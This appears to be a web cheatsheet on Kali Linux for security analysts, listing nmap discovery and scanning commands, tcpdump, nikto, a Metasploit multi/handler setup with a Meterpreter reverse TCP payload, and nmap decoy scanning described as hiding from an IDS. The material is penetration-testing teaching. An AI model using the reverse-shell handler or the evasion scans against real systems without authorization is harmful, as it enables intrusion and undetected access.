Cheatsheets

Kali Linux Cheatsheet for Security Analysts

by n8n admin

🤖 AI Prompts Cheatsheet

Daniel Osei — AI-Assisted Security Engineer

What is Kali Linux?

Kali Linux is a Debian-based Linux distribution designed for advanced penetration testing and security auditing. Developed and maintained by Offensive Security, it comes pre-installed with numerous security tools tailored for various aspects of information security.

Installation

Kali Linux can be installed on a variety of platforms, including virtual machines, bare-metal systems, and even as a live boot environment. The installation process can be initiated by downloading the ISO from the official Kali Linux website and following the on-screen instructions.

Basic Syntax

The basic syntax for executing commands in Kali Linux is as follows:

COMMAND [options] [arguments]

Discovery

Network Discovery

Identify hosts and services running on a network.

nmap -sP 192.168.1.0/24

This command performs a ping scan to detect live hosts in the network range.

Service Detection

nmap -sV -p 22,80,443 192.168.1.1

Detects versions of services running on specified ports.

Scanning

Port Scanning

nmap -p- 192.168.1.1

Scans all 65535 ports on the target.

Exploitation

Metasploit Framework

Use the Metasploit for developing and executing exploit code.

msfconsole

Launches the Metasploit console.

Using an Exploit

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
exploit

Sets up a payload for a reverse TCP connection.

Analysis

Capturing Packets

tcpdump -i eth0 -w capture.pcap

This command captures packets on the specified interface.

Evasion

Hiding from IDS

nmap -D RND:10 192.168.1.1

Uses decoy scanning to obfuscate the source.

Reporting

Generating Reports

nikto -h http://192.168.1.1 -o report.html

Generates a report of security vulnerabilities found on the web server.

Quick Reference Table

Flag Description
-sP Ping scan
-sV Service version detection
-p- Scan all ports
-D Decoy scanning

Pro Tips

  • Always update your tools: apt update && apt upgrade
  • Use verbose flags to understand what is happening: e.g., -v with nmap.
  • Chain your tools for larger operations; for example, direct packet captures to wireshark for deeper analysis.

Real-World Examples

During a penetration test, we used nmap to identify live hosts and then nmap -sV to discover services and their versions, which led to a successful exploitation of an outdated service running on a web application.

Related Posts

Effective Use of ChatGPT for Cybersecurity Tasks

📱 Mobile Security Tips Nina Kovacs — Consumer Security Analyst Why AI Changes the Game for Cybersecurity As the cybersecurity landscape evolves, AI tools like ChatGPT can significantly enhance the efficiency and effectiveness of security…

AI Prompts Cheatsheet for Security Analysis

🛠 Security Tool Cheatsheet Sarah Chen — SOC Analyst & Tool Specialist Why AI Changes the Game for Security Analysis Artificial Intelligence (AI) tools like ChatGPT, Claude, and Gemini significantly enhance the efficiency and effectiveness…

Essential Security Settings for Mobile Devices

🛠 Security Tool Cheatsheet Alex Morgan — Senior Penetration Tester Why This Matters In today’s digital world, mobile devices serve as central hubs for our personal and professional lives. Given the sensitive information stored on…